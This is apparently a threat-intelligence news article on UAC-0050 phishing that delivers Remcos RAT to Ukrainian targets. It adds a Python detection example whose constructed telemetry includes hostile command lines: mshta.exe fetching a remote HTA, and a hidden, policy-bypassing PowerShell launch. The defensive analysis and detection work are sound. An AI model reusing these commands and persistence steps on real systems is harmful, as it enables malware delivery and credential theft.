The threat actor known as UAC-0050 is leveraging phishing attacks to distribute Remcos RAT, using new strategies to evade detection by security software.
"The group's weapon of choice is Remcos RAT, a notorious malware for remote surveillance and control, which has been at the forefront of its espionage arsenal," Uptycs security researchers Karthickkumar Kathiresan and Shilpesh Trivedi said in a Wednesday report.
"However, in their latest operational twist, the UAC-0050 group has integrated a pipe method for interprocess communication, showcasing their advanced adaptability."
UAC-0050, active since 2020, has a history of targeting Ukrainian and Polish entities through social engineering campaigns that impersonate legitimate organizations to trick recipients into opening malicious attachments.
In February 2023, the Computer Emergency Response Team of Ukraine (CERT-UA) attributed to the adversary a phishing campaign designed to deliver Remcos RAT.
Over the past few months, the same trojan has been distributed as part of at least three different phishing waves, with one such attack also leading to the deployment of an information stealer called Meduza Stealer.
The analysis from Uptycs is based on a LNK file it discovered on December 21, 2023. While the exact initial access vector is currently unknown, it is suspected to have involved phishing emails targeting Ukrainian military personnel that claim to advertise consultancy roles with the Israel Defense Forces (IDF).
The LNK file in question collects information about antivirus products installed on the target computer, then retrieves and executes an HTML Application named "6.hta" from a remote server using mshta.exe, a Windows-native binary for running HTA files. A signed Microsoft binary fetching a script from a URL is a classic living-off-the-land pattern, and mshta.exe launching with an http(s) URL on its command line is a reliable place to alert.
This step paves the way for a PowerShell script that unpacks another PowerShell script to download two files called "word_update.exe" and "ofer.docx" from the domain new-tech-savvy[.]com; the document is the decoy shown to the victim while the executable runs.
Running word_update.exe causes it to create a copy of itself with the name fmTask_dbg.exe and establish persistence by creating a shortcut to the new executable in the Windows Startup folder.
The binary also uses unnamed (anonymous) pipes to exchange data between itself and a newly spawned cmd.exe child process, ultimately decrypting and launching Remcos RAT (version 4.9.2 Pro), which can harvest system data as well as cookies and login information from web browsers such as Internet Explorer, Mozilla Firefox, and Google Chrome. Because anonymous pipes between a parent and its child are how stdin/stdout redirection normally works on Windows, the pipe itself is not a useful indicator; what stands out is cmd.exe being spawned by an unsigned executable running from a user-writable directory, together with the Startup-folder shortcut that points back to it.
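The following is an added example, not code from Uptycs or from the report, of how the stages of this chain can be expressed as detection rules and run over endpoint telemetry. The events are constructed here in a Sysmon-like shape (process creation with image, parent and command line; file creation with image and target); the field names, the host example.invalid, the user name and the PowerShell script path are assumptions for the example. The file names fmTask_dbg.exe and 6.hta come from the article.

```python
import re

# Constructed sample telemetry (NOT events from the Uptycs report). Sysmon-like
# process-creation and file-creation records; hosts and paths are placeholders.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\explorer.exe",
     "parent": r"C:\Windows\System32\userinit.exe", "cmdline": "explorer.exe"},
    # LNK payload: mshta.exe pulling an HTA from a remote host (hypothetical URL).
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "mshta.exe http://example.invalid/6.hta"},
    # HTA hands off to PowerShell; the script path is a placeholder.
    {"type": "process",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"powershell.exe -NoP -W Hidden -EP Bypass -File C:\Users\victim\AppData\Local\Temp\stage.ps1"},
    # Persistence: the renamed binary drops a .lnk into the Startup folder.
    {"type": "file", "image": r"C:\Users\victim\AppData\Roaming\fmTask_dbg.exe",
     "target": r"C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fmTask_dbg.lnk"},
    # Loader spawns cmd.exe as a child and talks to it over anonymous pipes.
    {"type": "process", "image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Users\victim\AppData\Roaming\fmTask_dbg.exe", "cmdline": "cmd.exe"},
    # Benign noise that must not alert.
    {"type": "process", "image": r"C:\Windows\System32\notepad.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "notepad.exe"},
]

URL_RE = re.compile(r"https?://", re.I)
STARTUP_LNK_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$", re.I)
USER_WRITABLE_RE = re.compile(r"\\(AppData|Temp|Downloads|Public|ProgramData)\\", re.I)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule, evidence) pairs for every event matching a stage of the chain."""
    alerts = []
    for ev in events:
        if ev["type"] == "process":
            image, parent = basename(ev["image"]), basename(ev["parent"])
            # Stage 1: mshta.exe executing a remote HTA.
            if image == "mshta.exe" and URL_RE.search(ev["cmdline"]):
                alerts.append(("remote_hta", ev["cmdline"]))
            # Stage 2: PowerShell spawned by mshta.exe.
            if image == "powershell.exe" and parent == "mshta.exe":
                alerts.append(("powershell_from_mshta", ev["cmdline"]))
            # Stage 4: pipes to a cmd.exe child are ordinary; the signal is the
            # parent living in a user-writable directory, not the pipe itself.
            if image == "cmd.exe" and USER_WRITABLE_RE.search(ev["parent"]):
                alerts.append(("cmd_from_user_writable_binary", ev["parent"]))
        elif ev["type"] == "file":
            # Stage 3: a binary in a user-writable path writing a Startup .lnk.
            if STARTUP_LNK_RE.search(ev["target"]) and USER_WRITABLE_RE.search(ev["image"]):
                alerts.append(("startup_lnk_from_user_writable_binary", ev["target"]))
    return alerts


def chain_score(alerts):
    """Count of distinct stages observed; several together is far stronger than any one."""
    return len({rule for rule, _ in alerts})


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for rule, evidence in found:
        print(f"{rule}: {evidence}")
    print("distinct stages:", chain_score(found))
```

Each rule on its own will fire on legitimate activity now and then (administrators do run mshta.exe with URLs, and installers do write Startup shortcuts), which is why the example scores the number of distinct stages seen on a host rather than alerting on the first match.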
"Leveraging pipes within the Windows operating system provides a covert channel for data transfer, skillfully evading detection by Endpoint Detection and Response (EDR) and antivirus systems," the researchers said.
"Although not entirely new, this technique marks a significant leap in the sophistication of the group's strategies."